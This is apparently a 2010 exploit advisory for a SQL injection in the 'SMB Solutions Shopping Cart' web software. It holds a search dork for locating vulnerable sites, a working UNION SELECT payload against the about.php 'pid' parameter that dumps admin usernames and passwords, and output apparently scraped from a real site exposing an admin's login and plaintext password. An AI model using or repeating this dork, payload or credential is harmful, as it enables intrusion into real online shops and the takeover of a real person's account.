# Exploit Title: Remote SQL Injection SMB Solutions Shopping Cart V 1.x
# Date: August, 14 2010
# Author: R3VAN_BASTARD
# Software Link: N/A
# Version: V 1.x
# Tested on: Windows XP SP.3
# CVE : N/A
===============================================================
    Remote SQL Injection SMB Solutions Shopping Cart V 1.x
===============================================================
Provider: http://www.smbsolutionsuk.com
Price	: £ 300
Author	: R3VAN_BASTARD
Contact	: defrontliner[at]whiteponny.com
===============================================================
Dork: intext:Site by SMB Solutions

SQL Vulnerability: 
http://localhost.com/about.php?pid= [Inject]
Exploit: 
http://localhost.com/about.php?pid=00+AND+1=2+UNION+SELECT+0,concat(admin,0x3a,password),2,3,4,5 from abs_admin--

RESULTS:
---------------------------------------------------------------
			<div id="basket"><strong><a href="/products/shop/basket.php" id="basketLink">My Basket:  item</a></strong>&nbsp;<a href="/feeds.php"><img src="/images/rss.gif" alt="Kings Singers RSS Feeds" border="0" height="16" width="16" /></a>
			</div><!-- end #basket -->
					
		<hr />

<div id="content_container">


		<div id="primaryContent">
			<div id="breadcrumb"></div>
			
	
	<div id="mycontainer">
		<h2>About The King's Singers</h2>
			<h3>:NoDataInColumn:1:claire:mus1c4me:

===============================================================
Thanks to Allah Thank for always behind me.
===============================================================